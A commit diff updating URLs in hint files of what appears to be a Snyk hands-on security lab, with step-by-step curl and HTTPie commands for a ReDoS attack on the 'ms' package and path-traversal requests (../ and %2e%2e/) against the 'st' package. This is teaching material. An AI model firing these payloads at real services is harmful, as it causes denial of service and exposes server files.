updated urls

Author: mic-mccully

ms/hint1.md

@@ -3,5 +3,5 @@
 Try passing in a longer string into the content such that the pattern will take longer to match
 
 ```
-$ echo 'content=Buy milk in 5555555555555555555555555555555 minutes' | http --form http://localhost:3001/create -v
+$ echo 'content=Buy milk in 5555555555555555555555555555555 minutes' | https --form https://{your_instance}.cx.snyk.app/create -v
 ```

ms/hint2.md

@@ -3,5 +3,5 @@
 Let’s automate the brute force by repeating an integer a large number of times:
 
 ```
-$ echo 'content=Buy milk in '`printf %.0s5 {1..600}`' minutes' | http --form http://localhost:3001/create -v
+$ echo 'content=Buy milk in '`printf %.0s5 {1..600}`' minutes' | https --form https://{your_instance}.cx.snyk.app/create -v
 ```

ms/hint3.md

@@ -3,5 +3,5 @@
 Let’s ramp it up further. Note: You do not need to go higher than 60,000 to achieve a ReDoS.
 
 ```
-$ echo 'content=Buy milk in '`printf %.0s5 {1..60000}`' minutes' | http --form http://localhost:3001/create -v
+$ echo 'content=Buy milk in '`printf %.0s5 {1..60000}`' minutes' | https --form https://{your_instance}.cx.snyk.app/create -v
 ```

ms/hint5.md

@@ -3,5 +3,5 @@
 To achieve catastropic backtracking, change the content string such that it’s very large and so has many combinations to back track through, and will never complete. The example we show below changes ‘minutes’ to ‘minutea’ This simple change means ms will never be able to parse the string for a time duration, but by heck will it try! You’ll see approximately a 10-15 second delay. Try to access the application from the browser and add other todos which your request is processing. You’ve just successfully exploited a ReDoS vulnerability.
 
 ```
-$ echo 'content=Buy milk in '`printf %.0s5 {1..60000}`' minutea' | http --form http://localhost:3001/create -v
+$ echo 'content=Buy milk in '`printf %.0s5 {1..60000}`' minutea' | https --form https://{your_instance}.cx.snyk.app/create -v
 ```

st/hint10.md

@@ -3,7 +3,7 @@
 A good starting place is the application itself. There’s a package.json file which can show you a lot of detail about how the app is constructed, which packages are installed and at which versions:
 
 ```
-$ curl http://localhost:3001/public/%2e%2e/package.json
+$ curl https://{your_instance}.cx.snyk.app/public/%2e%2e/package.json
 ```
 
 ![package.json listing](../images/image11.png)

st/hint4.md

@@ -3,7 +3,7 @@
 To get you started on the terminal, try the following command to access the about page. You’ll notice that the application is so versatile, the about page will pretty much look just as good in the terminal as it does in a browser!
 
 ```
-$ curl http://localhost:3001/public/about.html
+$ curl https://{your_instance}.cx.snyk.app/public/about.html
 ```
 
 ![Curl about page](../images/image4.png)

st/hint5.md

@@ -3,5 +3,5 @@
 Try using ```../``` to break out of the public directory.
 
 ```
-$ curl http://localhost:3001/public/../
+$ curl https://{your_instance}.cx.snyk.app/public/../
 ```

st/hint9.md

@@ -3,7 +3,7 @@
 Try the following command:
 
 ```
-$ curl http://localhost:3001/public/%2e%2e/
+$ curl https://{your_instance}.cx.snyk.app/public/%2e%2e/
 ```
 
 ![st directory listing](../images/image2.png)